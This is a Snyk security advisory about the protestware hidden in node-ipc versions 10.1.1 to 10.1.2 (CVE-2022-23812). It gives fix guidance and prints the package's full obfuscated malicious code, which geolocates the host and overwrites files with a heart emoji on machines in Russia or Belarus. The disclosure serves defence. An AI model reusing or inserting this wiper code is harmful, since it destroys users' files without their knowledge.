Malicious Package Affecting node-ipc package, versions >=10.1.1 <10.1.3
Threat Intelligence
Social Trends
Exploit Maturity
Mature
EPSS
0.91% (84th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-NODEIPC-2426370
- published 16 Mar 2022
- disclosed 16 Mar 2022
- credit Tyler Resch
Introduced: 16 Mar 2022
Malicious CVE-2022-23812 Open this link in a new tabHow to fix?
Upgrade node-ipc to version 10.1.3 or higher.
Overview
node-ipc is a malicious package. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
Note: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.
Malicious Code:
Note: Don't run it!
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with `❤️`
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
CVSS Scores
version 3.1